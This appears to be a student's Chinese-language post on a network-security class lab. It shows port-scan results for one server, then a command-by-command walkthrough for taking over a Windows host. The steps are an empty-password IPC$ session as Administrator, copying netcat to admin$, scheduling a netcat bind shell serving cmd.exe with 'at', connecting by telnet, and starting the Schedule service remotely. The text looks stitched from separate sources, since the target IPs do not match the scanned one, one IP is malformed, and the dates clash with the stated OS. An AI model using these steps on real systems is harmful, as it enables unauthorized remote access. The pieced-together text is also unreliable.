网络安全课实验题目——破解一台ftp服务器

老师已将服务器ip公布，
用流光扫出此机os为：win2003 R2，安装了sql2000，
用扫描器扫得tcp端口如下：
TCP: 202.194.208.219 [21-ftp]
TCP: 202.194.208.219 [25-smtp]
TCP: 202.194.208.219 [80-www-http]
TCP: 202.194.208.219 [81-hosts2-ns]
TCP: 202.194.208.219 [82-xfer]
TCP: 202.194.208.219 [83-mit-ml-dev]
TCP: 202.194.208.219 [110-pop3]
TCP: 202.194.208.219 [119-nntp]
TCP: 202.194.208.219 [143-imap]
TCP: 202.194.208.219 [443-https]
TCP: 202.194.208.219 [465-url-rendezvous]
TCP: 202.194.208.219 [563-nntps]
TCP: 202.194.208.219 [993-imaps]
TCP: 202.194.208.219 [995-pop3s]
TCP: 202.194.208.219 [1025-blackjack]
TCP: 202.194.208.219 [1026-icq]
TCP: 202.194.208.219 [1028-icq]
TCP: 202.194.208.219 [1080-socks]
TCP: 202.194.208.219 [1110-nfsd-keepalive]
TCP: 202.194.208.219 [1433-ms-sql-s]
TCP: 202.194.208.219 [3128-ndl-aas]
TCP: 202.194.208.219 [3145-csi-lfap]
TCP: 202.194.208.219 [7900]
TCP: 202.194.208.219

F:\》net use \\222.181.83.199\ipc$ "" /user:"Administrator"
命令成功完成。

F:\》copy nc.exe \\222.181.83.199\admin$
已复制 1 个文件。

F:\》net time \\222.181.83.199
\\222.181.83.199 的当前时间是 2000/12/25 上午 10:25
在 \\222.181.83.199 的本地时间 (GMT - 07:00) 是 2000/12/25 上午10:35
命令成功完成。

F:\》at \\222.181.83.199 10:38 nc -l -p 1234 -t -e cmd.exe
新增加了一项作业，其作业 ID = 0

F:\》telnet 222.181.83.199 1234

上面的命令很简单，你只要参考一下net，at和nc的用法就可以了。这样，我们就登上了远程的主机。最理想的情况是这样的，但是，也许你会遇到目标主机的Schedule服务没有启动的情况，那么，at命令就不能用了，我们就需要增加以下步骤。

F:\》at \\1222.181.83.199 10:38 nc -l -p 1234 -t -e cmd.exe
服务仍未启动。

F:\》netsvc \\139.223.200.xxx schedule /start
Service is running on \\139.223.200.xxx

登上远程主机之后，我们可以做什么呢？这要视这个帐号的权限以及该主机的安全策略来决定。如果你的权限不够的话，可以试试下面的步骤。首先在本地执行下面的命令。